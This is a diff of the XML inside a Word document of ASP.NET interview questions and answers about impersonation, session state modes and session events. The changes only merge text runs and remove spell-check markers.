--- a/ASP.NET.docx
+++ b/ASP.NET.docx
@@ -1,11 +1,12 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:body>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:r>
         <w:t>ASP.NET</w:t>
       </w:r>
@@ -357,49 +358,21 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">Impersonation is an act of a user to pretend </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t>Impersonation is an act of a user to pretend itself to be another user. By default, ASP.NET executes application code using the same user account as that of ASP.NET process i.e. Network Service. But with impersonation enabled, it executes code with the windows identity of the user making the request.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>itself</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> to be another user. By default, ASP.NET executes application code using the same user account as that of ASP.NET process i.e. Network Service. But with impersonation enabled, it executes code with the windows identity of the user making the request.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">For example, if a user ‘user1′ logged in and IIS is setup to run as Network Service. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>If ‘user1′ call a piece of code on another computer (may be a web service call), the other computer will see the IIS user instead of ‘user1′.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> But we can enable impersonation to allow ‘user1′ to access the web service using its windows identity instead of Network Service.</w:t>
+        <w:t>For example, if a user ‘user1′ logged in and IIS is setup to run as Network Service. If ‘user1′ call a piece of code on another computer (may be a web service call), the other computer will see the IIS user instead of ‘user1′. But we can enable impersonation to allow ‘user1′ to access the web service using its windows identity instead of Network Service.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1120,14 +1093,12 @@
       <w:r>
         <w:t xml:space="preserve">]" -- </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
         <w:t>InProc</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1158,16 +1129,8 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">20 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>mins</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>20 mins</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1810,7 +1773,6 @@
         </w:tabs>
         <w:ind w:left="540"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1819,11 +1781,7 @@
         <w:t>Custom</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> modes allows</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to define our custom storage provider.</w:t>
+        <w:t xml:space="preserve"> modes allows to define our custom storage provider.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1875,13 +1833,8 @@
         <w:t>A</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Asp.Net use 120 bit identifier to track each session. This is secure enough and can't be reverse engineered. When client communicate with server, only session id is transmitted, between them. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>When client request for data, ASP.NET looks on to session ID and retrieves corresponding data.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>: Asp.Net use 120 bit identifier to track each session. This is secure enough and can't be reverse engineered. When client communicate with server, only session id is transmitted, between them. When client request for data, ASP.NET looks on to session ID and retrieves corresponding data.</w:t>
+      </w:r>
       <w:r>
         <w:br/>
       </w:r>
@@ -1989,122 +1942,86 @@
         <w:rPr>
           <w:rStyle w:val="Heading4Char"/>
         </w:rPr>
-        <w:t xml:space="preserve">9).What </w:t>
+        <w:t>9).What are Session Events?</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ans</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>: There are two types of session events available in ASP.NET:</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Session_Start</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Session_End</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Heading4Char"/>
-        </w:rPr>
-        <w:t>are</w:t>
+        <w:t>You</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Heading4Char"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Session Events?</w:t>
+        <w:t xml:space="preserve"> can handle both these events in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>global.asax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file of your web application. When a new session initiates, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>session_start</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> event is raised, and the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Session_End</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> event raised when a session is abandoned or expires.</w:t>
       </w:r>
       <w:r>
         <w:br/>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>Ans</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>: There are two types of session events available in ASP.NET:</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Session_Start</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
         <w:t>Session_End</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>You</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> can handle both these events in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>global.asax</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file of your web application. When a new session initiates, the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>session_start</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> event is raised, and the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Session_End</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> event </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>raised</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> when a session is abandoned or expires.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Session_End</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- event is supported by </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>InProc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mode only.</w:t>
+        <w:t>- event is supported by InProc mode only.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2238,39 +2155,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">13).What </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>are</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the disadvantages of using </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>InProc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> session mode?</w:t>
+        <w:t>13).What are the disadvantages of using InProc session mode?</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -2401,9 +2286,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve"> mode. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2412,9 +2297,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>mode</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>StateServer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2423,9 +2308,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> mode stores session state in a process, referred to as the ASP.NET state </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2434,9 +2319,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>StateServer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>service, that</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2445,10 +2330,13 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mode stores session state in a process, referred to as the ASP.NET state </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> is separate from the ASP.NET worker process or IIS application pool. Using this mode ensures that session state is preserved if the Web application is restarted and also makes session state available to multiple Web servers in a Web farm.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+        <w:spacing w:before="75" w:after="225" w:line="252" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
           <w:color w:val="333333"/>
@@ -2456,9 +2344,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>service, that</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2467,13 +2353,10 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> is separate from the ASP.NET worker process or IIS application pool. Using this mode ensures that session state is preserved if the Web application is restarted and also makes session state available to multiple Web servers in a Web farm.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
-        <w:spacing w:before="75" w:after="225" w:line="252" w:lineRule="atLeast"/>
+        <w:t xml:space="preserve">To use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
           <w:color w:val="333333"/>
@@ -2481,7 +2364,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>StateServer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2490,10 +2375,13 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">To use </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> mode, you must first be sure the ASP.NET state service is running on the server used for the session store. The ASP.NET state service is installed as a service when ASP.NET and the .NET Framework are installed. The ASP.Net state service is installed at the following location:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+        <w:spacing w:before="75" w:after="225" w:line="252" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
           <w:color w:val="333333"/>
@@ -2501,9 +2389,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>StateServer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2512,7 +2398,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mode, you must first be sure the ASP.NET state service is running on the server used for the session store. The ASP.NET state service is installed as a service when ASP.NET and the .NET Framework are installed. The ASP.Net state service is installed at the following location:</w:t>
+        <w:t>systemroot\Microsoft.NET\Framework\versionNumber\aspnet_state.exe</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2535,13 +2421,10 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>systemroot\Microsoft.NET\Framework\versionNumber\aspnet_state.exe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
-        <w:spacing w:before="75" w:after="225" w:line="252" w:lineRule="atLeast"/>
+        <w:t xml:space="preserve">To configure an ASP.NET application to use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
           <w:color w:val="333333"/>
@@ -2549,7 +2432,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>StateServer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2558,7 +2443,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">To configure an ASP.NET application to use </w:t>
+        <w:t xml:space="preserve"> mode, in the application's </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2569,7 +2454,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>StateServer</w:t>
+        <w:t>Web.config</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2580,10 +2465,13 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mode, in the application's </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> file do the following:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+        <w:spacing w:before="75" w:after="225" w:line="252" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
           <w:color w:val="333333"/>
@@ -2591,9 +2479,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>Web.config</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2602,13 +2488,10 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> file do the following:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
-        <w:spacing w:before="75" w:after="225" w:line="252" w:lineRule="atLeast"/>
+        <w:t xml:space="preserve">Set the mode attribute of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
           <w:color w:val="333333"/>
@@ -2616,7 +2499,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>sessionState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2625,7 +2510,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Set the mode attribute of the </w:t>
+        <w:t xml:space="preserve"> element to </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2636,7 +2521,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>sessionState</w:t>
+        <w:t>StateServer</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2647,10 +2532,13 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> element to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+        <w:spacing w:before="75" w:after="225" w:line="252" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
           <w:color w:val="333333"/>
@@ -2658,9 +2546,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>StateServer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2669,13 +2555,10 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
-        <w:spacing w:before="75" w:after="225" w:line="252" w:lineRule="atLeast"/>
+        <w:t xml:space="preserve">Set the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
           <w:color w:val="333333"/>
@@ -2683,7 +2566,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>stateConnectionString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2692,7 +2577,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Set the </w:t>
+        <w:t xml:space="preserve"> attribute to </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2703,7 +2588,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>stateConnectionString</w:t>
+        <w:t>tcpip</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2714,9 +2599,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> attribute to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>=serverName</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2725,9 +2610,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>tcpip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>:42424</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -2736,28 +2621,6 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:t>=serverName</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
-        </w:rPr>
-        <w:t>:42424</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
-        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -3174,15 +3037,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">20).What </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>are</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the advantages and disadvantages of </w:t>
